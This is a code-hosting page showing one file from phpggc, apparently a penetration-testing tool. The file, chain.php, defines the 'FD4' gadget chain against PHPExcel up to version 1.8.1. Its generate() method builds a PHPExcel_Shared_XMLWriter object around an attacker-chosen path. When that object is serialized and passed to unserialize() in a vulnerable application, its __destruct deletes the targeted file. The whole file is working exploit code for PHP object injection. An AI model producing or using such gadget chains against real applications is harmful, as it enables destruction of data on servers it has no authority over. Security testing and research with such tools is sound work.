Codebase list phpggc / 16afd3a1-bf81-4b7b-b168-0f87eabff139/upstream gadgetchains / PHPExcel / FD / 4 / chain.php
16afd3a1-bf81-4b7b-b168-0f87eabff139/upstream

Tree @16afd3a1-bf81-4b7b-b168-0f87eabff139/upstream (Download .tar.gz)

chain.php @16afd3a1-bf81-4b7b-b168-0f87eabff139/upstreamraw · history · blame

<?php

namespace GadgetChain\PHPExcel;

class FD4 extends \PHPGGC\GadgetChain\FileDelete
{
    public static $version = '<= 1.8.1';
    public static $vector = '__destruct';
    public static $author = 'erwan_lr';
    
    public function generate(array $parameters)
    {
        return new \PHPExcel_Shared_XMLWriter($parameters['remote_path']);
    }
}